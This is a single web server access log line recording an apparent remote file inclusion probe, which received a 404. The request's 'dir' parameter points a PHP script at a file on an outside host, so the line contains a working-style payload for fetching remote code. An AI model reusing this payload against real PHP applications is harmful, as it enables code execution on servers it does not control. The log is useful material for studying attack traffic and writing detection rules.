123.143.98.5 - - [28/Jul/2009:05:06:08 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/id.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
